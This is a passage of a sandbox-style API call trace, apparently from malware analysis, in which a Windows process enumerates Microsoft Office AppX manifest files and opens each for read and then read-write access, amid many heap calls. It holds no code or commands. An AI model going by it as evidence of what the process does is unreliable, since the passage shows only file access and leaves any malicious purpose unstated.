dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0098.960] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0098.960] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0098.960] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0098.960] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0098.960] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0098.960] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0098.960] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0098.960] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0098.960] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0098.960] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76110 [0098.960] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76020 [0098.960] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76188 [0098.960] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75be8 [0098.960] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76188 | out: hHeap=0x20000) returned 1 [0098.960] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76020 | out: hHeap=0x20000) returned 1 [0098.960] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0098.960] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76110 | out: hHeap=0x20000) returned 1 [0098.961] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0098.961] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76110 [0098.961] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76278 [0098.961] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0098.961] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76020 [0098.961] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0098.961] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76278 | out: hHeap=0x20000) returned 1 [0098.961] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76110 | out: hHeap=0x20000) returned 1 [0098.961] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75cd8 [0098.961] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76020 | out: hHeap=0x20000) returned 1 [0098.961] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75fa8 [0098.961] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75cd8 | out: hHeap=0x20000) returned 1 [0098.961] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0098.961] AreFileApisANSI () returned 1 [0098.961] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75f30, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 105 [0098.961] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd2) returned 0x55f20 [0098.961] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75f30, cbMultiByte=-1, lpWideCharStr=0x55f20, cchWideChar=105 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0057-0000-1000-0000000FF1CE.xml") returned 105 [0098.961] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0057-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0057-0000-1000-0000000ff1ce.xml"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xbf2f172d, ftCreationTime.dwHighDateTime=0x1d47c31, ftLastAccessTime.dwLowDateTime=0xbf2f172d, ftLastAccessTime.dwHighDateTime=0x1d47c31, ftLastWriteTime.dwLowDateTime=0xbf2f172d, ftLastWriteTime.dwHighDateTime=0x1d47c31, nFileSizeHigh=0x0, nFileSizeLow=0x53d21)) returned 1 [0098.961] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0098.961] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0098.961] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0098.961] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75f30 | out: hHeap=0x20000) returned 1 [0098.961] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.961] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.961] FindNextFileW (in: hFindFile=0x78410, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x8394994f, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x8394994f, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x83ea71ba, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x3a41, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="AppXManifest.90160000-006E-0409-1000-0000000FF1CE.xml", cAlternateFileName="AP330B~1.XML")) returned 1 [0098.961] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0098.961] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0098.961] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0098.962] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68fe0 [0098.962] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0098.962] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46908 [0098.962] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68fe0 | out: hHeap=0x20000) returned 1 [0098.962] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9a) returned 0x8d0d0 [0098.962] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46908 | out: hHeap=0x20000) returned 1 [0098.962] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76200 [0098.962] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76110 [0098.962] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75be8 [0098.962] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76110 | out: hHeap=0x20000) returned 1 [0098.962] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76200 | out: hHeap=0x20000) returned 1 [0098.962] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8d0d0 | out: hHeap=0x20000) returned 1 [0098.962] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0098.962] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf00 [0098.962] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35090 [0098.962] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0098.962] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35090 | out: hHeap=0x20000) returned 1 [0098.962] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d080 [0098.962] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f30 [0098.962] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0098.962] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f30 | out: hHeap=0x20000) returned 1 [0098.962] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75c60 [0098.962] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76110 [0098.962] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75f30 [0098.962] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xe0) returned 0x89558 [0098.962] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76110 | out: hHeap=0x20000) returned 1 [0098.962] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75f30 | out: hHeap=0x20000) returned 1 [0098.962] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xe0) returned 0x89470 [0098.962] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x89558 | out: hHeap=0x20000) returned 1 [0098.962] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.962] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.962] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.962] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.962] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x89470 | out: hHeap=0x20000) returned 1 [0098.962] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75c60 | out: hHeap=0x20000) returned 1 [0098.962] AreFileApisANSI () returned 1 [0098.962] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-006E-0409-1000-0000000FF1CE.xml", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-006E-0409-1000-0000000FF1CE.xml", lpUsedDefaultChar=0x0) returned 105 [0098.962] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75be8 [0098.963] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.963] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.963] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0098.963] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0098.963] AreFileApisANSI () returned 1 [0098.963] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75be8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 105 [0098.963] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd2) returned 0x55f20 [0098.963] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75be8, cbMultiByte=-1, lpWideCharStr=0x55f20, cchWideChar=105 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-006E-0409-1000-0000000FF1CE.xml") returned 105 [0098.963] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-006E-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-006e-0409-1000-0000000ff1ce.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0098.963] GetFileType (hFile=0x418) returned 0x1 [0098.963] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0098.963] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0098.963] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0098.964] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0098.964] CloseHandle (hObject=0x418) returned 1 [0098.964] AreFileApisANSI () returned 1 [0098.964] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75be8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 105 [0098.964] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd2) returned 0x55f20 [0098.964] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75be8, cbMultiByte=-1, lpWideCharStr=0x55f20, cchWideChar=105 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-006E-0409-1000-0000000FF1CE.xml") returned 105 [0098.964] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-006E-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-006e-0409-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0098.964] GetFileType (hFile=0x418) returned 0x1 [0098.964] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0098.964] CloseHandle (hObject=0x418) returned 1 [0098.964] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0098.964] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0098.965] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0098.965] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0098.965] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0098.965] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0098.965] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0098.965] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0098.965] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0098.965] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0098.965] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0098.965] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0098.965] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0098.965] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0098.965] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0098.965] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0098.965] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0098.965] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0098.965] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0098.965] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0098.965] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0098.965] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0098.965] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0098.965] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76110 [0098.965] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75f30 [0098.965] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75fa8 [0098.965] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76020 [0098.965] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0098.965] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75f30 | out: hHeap=0x20000) returned 1 [0098.965] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0098.965] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76110 | out: hHeap=0x20000) returned 1 [0098.965] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76020 | out: hHeap=0x20000) returned 1 [0098.965] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75cd8 [0098.965] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75c60 [0098.965] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0098.965] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75f30 [0098.965] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0098.965] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75c60 | out: hHeap=0x20000) returned 1 [0098.965] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75cd8 | out: hHeap=0x20000) returned 1 [0098.966] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75c60 [0098.966] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75f30 | out: hHeap=0x20000) returned 1 [0098.966] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75cd8 [0098.966] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75c60 | out: hHeap=0x20000) returned 1 [0098.966] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75cd8 | out: hHeap=0x20000) returned 1 [0098.966] AreFileApisANSI () returned 1 [0098.966] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75be8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 105 [0098.966] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd2) returned 0x55f20 [0098.966] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75be8, cbMultiByte=-1, lpWideCharStr=0x55f20, cchWideChar=105 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-006E-0409-1000-0000000FF1CE.xml") returned 105 [0098.966] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-006E-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-006e-0409-1000-0000000ff1ce.xml"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x8394994f, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x8394994f, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x83ea71ba, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x3a41)) returned 1 [0098.966] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0098.966] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0098.966] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0098.966] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0098.966] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.966] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.966] FindNextFileW (in: hFindFile=0x78410, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x831d63af, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x831d63af, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x83543a09, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x573e5, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="AppXManifest.90160000-0090-0000-1000-0000000FF1CE.xml", cAlternateFileName="APPXMA~1.XML")) returned 1 [0098.966] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0098.966] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0098.966] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0098.966] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68ef0 [0098.966] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0098.966] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46898 [0098.966] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68ef0 | out: hHeap=0x20000) returned 1 [0098.966] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9a) returned 0x8cf80 [0098.966] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46898 | out: hHeap=0x20000) returned 1 [0098.966] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75f30 [0098.966] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76110 [0098.966] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75be8 [0098.966] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76110 | out: hHeap=0x20000) returned 1 [0098.966] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75f30 | out: hHeap=0x20000) returned 1 [0098.966] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8cf80 | out: hHeap=0x20000) returned 1 [0098.966] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0098.966] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0098.967] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fb0 [0098.967] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0098.967] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fb0 | out: hHeap=0x20000) returned 1 [0098.967] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0098.967] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35030 [0098.967] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0098.967] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35030 | out: hHeap=0x20000) returned 1 [0098.967] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75be8 [0098.967] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75c60 [0098.967] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0098.967] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xe0) returned 0x89470 [0098.967] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75c60 | out: hHeap=0x20000) returned 1 [0098.967] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0098.967] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xe0) returned 0x891b8 [0098.967] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x89470 | out: hHeap=0x20000) returned 1 [0098.967] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.967] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.967] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.967] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.967] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x891b8 | out: hHeap=0x20000) returned 1 [0098.967] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0098.967] AreFileApisANSI () returned 1 [0098.967] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0090-0000-1000-0000000FF1CE.xml", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0090-0000-1000-0000000FF1CE.xml", lpUsedDefaultChar=0x0) returned 105 [0098.967] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75f30 [0098.967] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 